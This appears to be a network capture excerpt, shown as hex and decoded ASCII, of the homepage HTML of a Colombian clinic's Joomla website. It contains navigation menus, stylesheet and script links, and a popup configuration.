                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC54INData Raw: 37 63 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 7c48<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC54INData Raw: 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e
                                                                                                                                                                                                                                                                          Data Ascii: stem/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/en
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC56INData Raw: 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73
                                                                                                                                                                                                                                                                          Data Ascii: re.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/s
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC57INData Raw: 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a
                                                                                                                                                                                                                                                                          Data Ascii: tshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/users/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]-->
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC59INData Raw: 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75
                                                                                                                                                                                                                                                                          Data Ascii: ntal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC60INData Raw: 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: a-g-menuparent><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC61INData Raw: 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 20 3c 73 70 61 6e 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: ss="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent> <span cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC63INData Raw: 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61
                                                                                                                                                                                                                                                                          Data Ascii: nales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC64INData Raw: 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e
                                                                                                                                                                                                                                                                          Data Ascii: uestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right">
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC65INData Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC67INData Raw: 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73
                                                                                                                                                                                                                                                                          Data Ascii: pan></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</s
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC68INData Raw: 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c
                                                                                                                                                                                                                                                                          Data Ascii: rbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio<
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC69INData Raw: 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC71INData Raw: 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67
                                                                                                                                                                                                                                                                          Data Ascii: ntent"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rg
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC72INData Raw: 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c
                                                                                                                                                                                                                                                                          Data Ascii: : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div cl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC73INData Raw: 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f
                                                                                                                                                                                                                                                                          Data Ascii: (boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blo
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC75INData Raw: 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74
                                                                                                                                                                                                                                                                          Data Ascii: nimated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contact
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC76INData Raw: 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67
                                                                                                                                                                                                                                                                          Data Ascii: g-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC77INData Raw: 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: tion"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="
